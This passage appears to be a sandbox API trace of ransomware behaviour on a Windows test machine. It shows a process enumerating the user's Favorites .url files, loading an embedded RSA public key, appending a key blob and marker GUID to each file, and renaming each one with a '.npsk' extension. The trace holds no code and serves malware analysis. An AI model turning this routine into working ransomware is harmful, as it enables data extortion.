1 [0216.492] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0216.492] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned=".url" [0216.492] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.492] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=133) returned 1 [0216.492] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.494] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.494] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.495] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x85, lpOverlapped=0x0) returned 1 [0216.495] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.495] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.495] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.495] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1e80) returned 1 [0216.496] CryptCreateHash (in: hProv=0x7b1e80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.496] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.496] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.496] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.496] GetLastError () returned 0x0 [0216.496] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.496] CryptReleaseContext (hProv=0x7b1e80, dwFlags=0x0) returned 1 [0216.496] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.496] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.496] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.496] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.497] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.497] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.497] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.497] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.497] CloseHandle (hObject=0x61c) returned 1 [0216.498] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.npsk")) returned 1 [0216.499] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0216.499] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned=".url" [0216.499] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.501] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=134) returned 1 [0216.501] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.502] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.502] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.503] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x86, lpOverlapped=0x0) returned 1 [0216.503] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.503] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.503] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.503] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1e80) returned 1 [0216.504] CryptCreateHash (in: hProv=0x7b1e80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.504] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.504] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.504] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.504] GetLastError () returned 0x0 [0216.504] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.504] CryptReleaseContext (hProv=0x7b1e80, dwFlags=0x0) returned 1 [0216.504] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.504] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.504] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.504] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.505] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.505] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.505] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.505] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.505] CloseHandle (hObject=0x61c) returned 1 [0216.511] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.npsk")) returned 1 [0216.513] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0216.513] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.513] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.513] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.513] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0216.513] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0216.513] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.513] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.513] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.513] PathFindFileNameW (pszPath="") returned="" [0216.513] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.514] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.514] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0216.514] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned=".url" [0216.514] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.515] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=133) returned 1 [0216.515] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.516] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.516] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.517] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x85, lpOverlapped=0x0) returned 1 [0216.517] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.517] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.517] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.517] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.518] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.518] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.518] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.518] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.518] GetLastError () returned 0x0 [0216.518] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.518] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.518] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.518] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.518] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.519] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.519] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.519] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.519] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.519] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.519] CloseHandle (hObject=0x61c) returned 1 [0216.520] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.npsk")) returned 1 [0216.521] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0216.521] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned=".url" [0216.521] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.523] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=133) returned 1 [0216.523] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.524] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.524] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.525] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, 